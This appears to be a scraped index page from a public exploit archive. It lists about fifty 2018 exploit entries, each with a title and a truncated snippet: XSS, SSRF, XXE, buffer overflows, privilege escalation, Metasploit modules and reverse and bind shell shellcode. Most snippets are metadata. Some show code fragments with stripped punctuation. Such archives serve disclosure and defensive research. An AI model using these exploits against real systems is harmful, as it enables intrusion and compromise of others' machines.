Wavemaker Studio 6.6 - Server-Side Request Forgery

Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery SSRF. Exploit Author: Gionathan "John" Reale Google Dork: N/A Date: 2018-08-01 Vendor Homepage: http://www.wavemaker.com/ Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/ Affected Version...

Monstra 3.0.4 - Cross-Site Scripting

Monstra 3.0.4 - Cross-Site Scripting. CVE-2018-14922. Webapps exploit for PHP platform Exploit Title:Monstra-Dev 3.0.4 Stored Cross Site Scripting Date: 04-08-2018 Exploit Author: Nainsi Gupta Vendor Homepage: http://monstra.org/ Software Link: https://github.com/monstra-cms/monstra Published In-...

Open-AudIT Community 2.2.6 - Cross-Site Scripting

Exploit Title: Open-AudIT Community 2.2.6 - Cross-Site Scripting Google Dork:NA Exploit Date: 2018-08-01 Exploit Author: Ranjeet Jaiswal Vendor Homepage: https://opmantek.com/ Software Link:https://opmantek.com/network-tools-download/open-audit/ Affected Version: 2.2.6 Category: WebApps Tested on...

LAMS < 3.1 - Cross-Site Scripting

Exploit Title: LAMS 3.1 - Cross-Site Scripting Date: 2018-08-05 Exploit Author: Nikola Kojic Website: https://ras-it.rs/ Vendor Homepage: https://www.lamsfoundation.org/ Software Link: https://www.lamsfoundation.org/downloadshome.htm Category: Web Application Platform: Java Version: = 3.1 CVE:...

CMS ISWEB 3.5.3 - Directory Traversal

Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal Date: 2018-08-01 Exploit Author: Thiago "thxsena" Sena Vendor Homepage: http://www.isweb.it Version: 3.5.3 Tested on: Linux CVE : N/A PoC: CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download, as demonstrated by...

Sitecore.Net 8.1 - Directory Traversal

Exploit Title: Sitecore.Net 8.1 - Directory Traversal Date: 2018-04-23 CVE: CVE-2018-7669 Researcher: Chris Moberly at The Missing Link Security Vendor: Sitecore Version: CMS - 8.1 and up earlier versions untested Authentication required: Yes An issue was discovered in Sitecore CMS that affects a...

CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)

Exploit Title: CloudMe Sync 1.10.9 - Buffer Overflow SEHDEP Bypass Date: 2018-08-05 Exploit Author: Manoj Ahuje Linkedin: https://www.linkedin.com/in/manojahuje/ Vendor Homepage: https://www.cloudme.com/ Software Link: https://www.cloudme.com/downloads/CloudMe1109.exe Tested on: Windows 10 Home x...

Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation

include "stdafx.h" include include include include pragma comment lib,"psapi" PULONGLONG leakbuffer = PULONGLONGVirtualAllocLPVOID0x000000001a000000, 0x2000, MEMRESERVE | MEMCOMMIT, PAGEREADWRITE; ULONGLONG leakQWORDULONGLONG addr, HANDLE driver memsetLPVOID0x000000001a000000, 0x11, 0x1000;...

Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection

Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing Reserved CVE: CVE-2018-13415 Vulnerability Overview The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing XXE attack. Unauthenticated attackers on the same LAN can use...

Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)

Linux/x86 - Reverse TCP ::FFFF:192.168.1.5:4444/TCP Shell /bin/sh + Null-Free + IPv6 Shellcode 86 bytes. Shellcode exploit for Linuxx86 platform Title: Linux/x86 - Reverse TCP shell IPv6 + Null Free Shellcode Author: Kartik Durg Shellcode Length: 86 BYTES Student-ID: SLAE-1233 Note...

Linux/ARM - Bind (4444/TCP) Shell +IPv6 Shellcode (128 Bytes)

Linux/ARM - Bind 4444/TCP Shell +IPv6 Shellcode 128 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - IPv6 4444/TCP Bind Shellcode 128 Bytes Date: 2018-07-25 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.52-v7+ 1123 SMP...

Basic B2B Script 2.0.0 - Cross-Site Scripting

Basic B2B Script 2.0.0 - Cross-Site Scripting. CVE-2018-14541. Webapps exploit for PHP platform Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields. Date: 20.07.2018 Site Titel : B2B Script Vendor...

Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection

Issue: Out-of-Band XXE in Vuze Bittorrent Client's SSDP Processing Reserved CVE: CVE-2018-13417 Vulnerability Overview The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing XXE attack. Unauthenticated attackers on the same L...

PHP Template Store Script 3.0.6 - Cross-Site Scripting

Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name Date: 02.08.2018 Site Titel : Exclusive Scripts Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/ Category: Web Application Version: 3.0.6 Exploit...

Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting

Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting. CVE-2018-14082. Webapps exploit for PHP platform Exploit Title: Entrepreneur Job Portal Script 3.0.1- has Stored XSS via Search bar and Location Date: 14.07.2018 Site Titel : JOB SITE Job Portal Vendor Homepage:...

Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Linux Kernel UDP Fragmentation Offset UFO Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on Linux systems...

Wedding Slideshow Studio 1.36 - Buffer Overflow

Exploit Title: Socumsoft Wedding Slideshow Studio 1.36 Date: 02.08.2018 Exploit Author: Achilles Vendor Homepage: http://www.socusoft.com Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe Tested on OS: Windows 7 64-bit DE Steps to reproduce: Copy the contents of the...

cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal

There is a directory traversal vulnerability in cgitcloneobjects, reachable when the configuration flag enable-http-clone is set to 1 default: void cgitcloneobjectsvoid if !ctx.qry.path cgitprinterrorpage400, "Bad request", "Bad request"; return; if !strcmpctx.qry.path, "info/packs" printpackinfo...

Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection

Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing XXE attack. Unauthenticated attackers on the same L...

Seq 4.2.476 - Authentication Bypass

Exploit Title: Seq 4.2.476 - Authentication Bypass Date: 2018-08-02 Exploit Author: Daniel Chactoura Vendor Homepage: https://getseq.net/ Software Link: https://getseq.net/Download/All Version: = 4.2.476 CVE : CVE-2018-8096 Post Reference:...

PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection

Exploit Title: FB Inboxer 1.2 - 'searchfield' SQL Injection Google Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/pageresponse-a-fb-inboxer-addon-facebook-auto-commentprivate-reply-likeshare-for-full-page/21486371 Version: 1.2...

WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)

input t...

ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution

Exploit Title: ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/ Version: 1.1.2.3345 Tested on: 1.1.2.3345 GET...

CoSoSys Endpoint Protector 4.5.0.1 - (Authenticated) Remote Root Command Injection

Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018 Author : 0x09AL Tested on : Endpoint Protector 4.5.0.1 Software Link : https://www.endpointprotector.com/ Vulnerable Versions : Endpoint...

Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation

/ Exploit Title: Solaris/OpenSolaris AVS kernel code execution Google Dork: if applicable Date: 24/7/2018 Exploit Author: mu-b Vendor Homepage: oracle.com Software Link: Version: Solaris 10, Solaris Sun Opensolaris include include include include include include include include include include...

Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting

Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting. CVE-2018-13256. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Chartered Accountant : Auditor Website 2.0.1 - Reflected , Stored XSS Date: 26.06.2018 Site Titel : Find your needs on Domain Name...

TI Online Examination System v2 - Arbitrary File Download

Exploit Title: TI Online Examination System v2 - Arbitrary File Download Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 Version: 2.0 Category: Webapps Tested on: Kali linux Description : Th...

Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation

Title: Imperva SecureSphere = v13 - Privilege Escalation Author: 0x09AL Date: 01/08/2018 Tested on: Imperva SecureSphere 11.5,12.0,13.0 Vendor: https://www.imperva.com/ Vulnerability Description There is a program named PCE.py which runs as root and starts a unix domain socket listener in...

AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)

Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-02 Vendor Homepage: http://agatasoft.com/ Software Link : http://agatasoft.com/PingMaster.exe Tested Version: 1.5 Vulnerability Type: Denial of Service DoS Local...

SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SecureSphere v12.0.0.50 - SealMode Shell Escape root", 'Description' = %q This module exploits a vulnerability in SecureSphere cli to escape the...

WebRTC - FEC Processing Overflow

There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incomingrtppacket, which is an RTP packet with a mac length that is defined by the transport 2048 bytes for DTLS in Chrome. This packet is...

Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)

Linux/ARM - Reverse ::1:4444/TCP Shell /bin/sh +IPv6 Shellcode 116 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode 116 Bytes Date: 2018-07-25 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi...

WebRTC - VP8 Block Decoding Use-After-Free

There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block is then treated a pointer, leading to a crash in WebRTC. ==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc 0x0000014cde2f bp 0x7ff20616d7e0 sp 0x7ff20616d7d8 READ of size...

WebRTC - H264 NAL Packet Processing Type Confusion

Type confusion can occur when processing a H264 packet. In the method PacketBuffer::FindFrames in modules/videocoding/packetbuffer.cc there is a loop on line 296 that goes through the databuffer vector backwards. The flag ish264 is set before this loop, and if it is true, the loop extracts and se...

SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SonicWall Global Management System XMLRPC settimezone Unath RCE", 'Description' = %q This module exploits a vulnerability in SonicWall Global...

Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)

Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC Vulnerability Type: SEH Overwrite POC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-01 Software Link: http://www.alloksoft.com/fastsplitter.htm Tested Version: 1.2 Tested on OS:...

Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service (PoC)

Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://switchportmapper.com/ Software Link : http://download.switchportmapper.com/spm281.zip Tested Version: 2.81 Vulnerability Type:...

ipPulse 1.92 - 'Licence Key' Denial of Service (PoC)

Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovery Date: 2018-07-30 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link: http://download.netscantools.com/ipls192.zip Tested...

LG NAS 3718.510.a0 - Remote Command Execution

LG NAS 3718.510.a0 - Remote Command Execution Author: @0x616163 Date: 2018-07-29 Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ CVE: N/A Firmware Version: 3718.510.a0 !/usr/bin/env python import sys import argparse import requests from collections...

Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection

Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Date: 2018-07-20 Software Link: https://github.com/nystudio107/craft-seomatic Exploit Author: Sebastian Kriesten 0xB455 Contact: https://twitter.com/0xB455 CVE: CVE-2018-14716 Category: webapps 1. Description An...

Responsive Filemanager 9.13.1 - Server-Side Request Forgery

Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery Date: 2018-07-29 Exploit Author: GUIA BRAHIM FOUAD Vendor Homepage: http://responsivefilemanager.com/ Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsivefilemanager.zip...

Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)

Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow SEH Date: 2018-07-29 Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Software Link: http://www.alloksoft.com/allokmovconverter.exe Tested Version: 4.6.1217 Tested on OS: Windows XP Service Pack 3 x86 Greetz:...

fusermount - user_allow_other Restriction Bypass and SELinux Label Control

/ It is possible to bypass fusermount's restrictions on the use of the "allowother" mount option as follows if SELinux is active. Here's a minimal demo, tested on a Debian system with SELinux enabled in permissive mode: =============================================== uuser@debian:$ mount|grep...

Charles Proxy 4.2 - Local Privilege Escalation

Charles Proxy is a great mac application for debugging web services and inspecting SSL traffic for any application on your machine. In order to inspect the SSL traffic it needs to configure the system to use a proxy so that it can capture the packets and use its custom root CA to decode the SSL...

Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)

/ Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service PoC Author: vportal Date: 2018-07-27 Vendor homepage: http://www.microsoft.com Version: Windows 7 x86 Tested on: Windows 7 x86 CVE: N/A It is possible to trigger a BSOD caused by a Null pointer deference...

ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)

Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link : http://download.netscantools.com/ipls192.zip Tested Version: 1.92 Vulnerability...

H2 Database 1.4.197 - Information Disclosure

Exploit Title: H2 Database 1.4.197 - Information Disclosure Date: 2018-07-16 Exploit Author: owodelta Vendor Homepage: www.h2database.com Software Link: http://www.h2database.com/html/download.html Version: all versions Tested on: Linux CVE : CVE-2018-14335 Description: Insecure handling of...

WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' = %q This module exploits an arbitrary file upload vulnerability in...

Skia - Heap Overflow in SkScan::FillPath due to Precision Error

There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached. Details: When Skia fills a path with antialiasing turned off,...

NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)

Exploit Title: NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service PoC Discovery by: Luis Martínez Discovery Date: 2018-07-26 Vendor Homepage: https://www.netscantools.com/ Software Link : http://download.netscantools.com/nstb250.zip Tested Version: 2.5 Vulnerability Type: Denial of...